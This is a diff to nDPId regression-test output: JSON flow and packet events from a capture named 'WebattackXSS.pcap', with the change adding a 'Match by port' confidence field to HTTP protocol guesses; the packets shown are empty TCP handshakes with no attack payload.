+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347247114,"flow_last_seen":1499347252685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347375148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347247114,"flow_last_seen":1499347252685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347375148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347248373,"flow_last_seen":1499347253687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347375148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55172,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347248373,"flow_last_seen":1499347253687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347375148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55172,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347248373,"flow_last_seen":1499347253687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347375148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347249651,"flow_last_seen":1499347254687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347375148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55186,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347249651,"flow_last_seen":1499347254687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347375148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55186,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347249651,"flow_last_seen":1499347254687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347375148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347252179,"flow_last_seen":1499347257688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347375148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55212,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347252179,"flow_last_seen":1499347257688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347375148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55212,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347252179,"flow_last_seen":1499347257688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347375148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347253445,"flow_last_seen":1499347258688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347375148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55226,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347253445,"flow_last_seen":1499347258688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347375148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55226,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347253445,"flow_last_seen":1499347258688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347375148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3391,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347375388,"flow_last_seen":1499347375388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347375388,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3391,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1499347375388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347375388,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VfhAAD4Gb9isEAABwKgKMtzKAFDNpCPqAAAAAKACchAZDgAAAgQFtAQCCAoBOnYSAAAAAAEDAwc="}
@@ -1310,17 +1310,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3464,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1499347384186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347384186,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bHdAAD4GWVmsEAABwKgKMt0oAFALKxLdAAAAAKACchDjngAAAgQFtAQCCAoBOn6qAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3465,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1499347384186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347384186,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Sg6aAAMCysS3qAScSBWBQAAAgQFtAQCCAoD5FAgATp+qgEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":1499347384187,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347384187,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bHhAAD4GWWCsEAABwKgKMt0oAFALKxLeOmgADYAQAOX1DAAAAQEICgE6fqoD5FAg"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347254714,"flow_last_seen":1499347260689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55240,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347254714,"flow_last_seen":1499347260689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55240,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347254714,"flow_last_seen":1499347260689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347257224,"flow_last_seen":1499347262689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55266,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347257224,"flow_last_seen":1499347262689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55266,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347257224,"flow_last_seen":1499347262689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347258474,"flow_last_seen":1499347263689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55280,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347258474,"flow_last_seen":1499347263689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347258474,"flow_last_seen":1499347263689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347259759,"flow_last_seen":1499347265691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55294,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347259759,"flow_last_seen":1499347265691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55294,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347259759,"flow_last_seen":1499347265691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55294,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347262289,"flow_last_seen":1499347267691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55320,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347262289,"flow_last_seen":1499347267691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347262289,"flow_last_seen":1499347267691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347263542,"flow_last_seen":1499347268692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55334,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347263542,"flow_last_seen":1499347268692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55334,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347263542,"flow_last_seen":1499347268692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347385481,"flow_last_seen":1499347385481,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347385481,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1499347385481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347385481,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VSxAAD4GcKSsEAABwKgKMt02AFBQ3SrBAAAAAKACchCEtwAAAgQFtAQCCAoBOn\/tAAAAAAEDAwc="}
@@ -1346,19 +1346,19 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3552,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1499347394398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347394398,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eldAAD4GS3msEAABwKgKMt2UAFCjvfL0AAAAAKACchBgjwAAAgQFtAQCCAoBOoijAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":2,"flow_last_seen":1499347394398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347394398,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3ZQ04Dogo73y9aAScSCUcAAAAgQFtAQCCAoD5FoZATqIowEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":3,"flow_last_seen":1499347394399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347394399,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0elhAAD4GS4CsEAABwKgKMt2UAFCjvfL1NOA6IYAQAOUzeAAAAQEICgE6iKMD5FoZ"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347264804,"flow_last_seen":1499347270693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55348,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347264804,"flow_last_seen":1499347270693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55348,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347264804,"flow_last_seen":1499347270693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55348,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
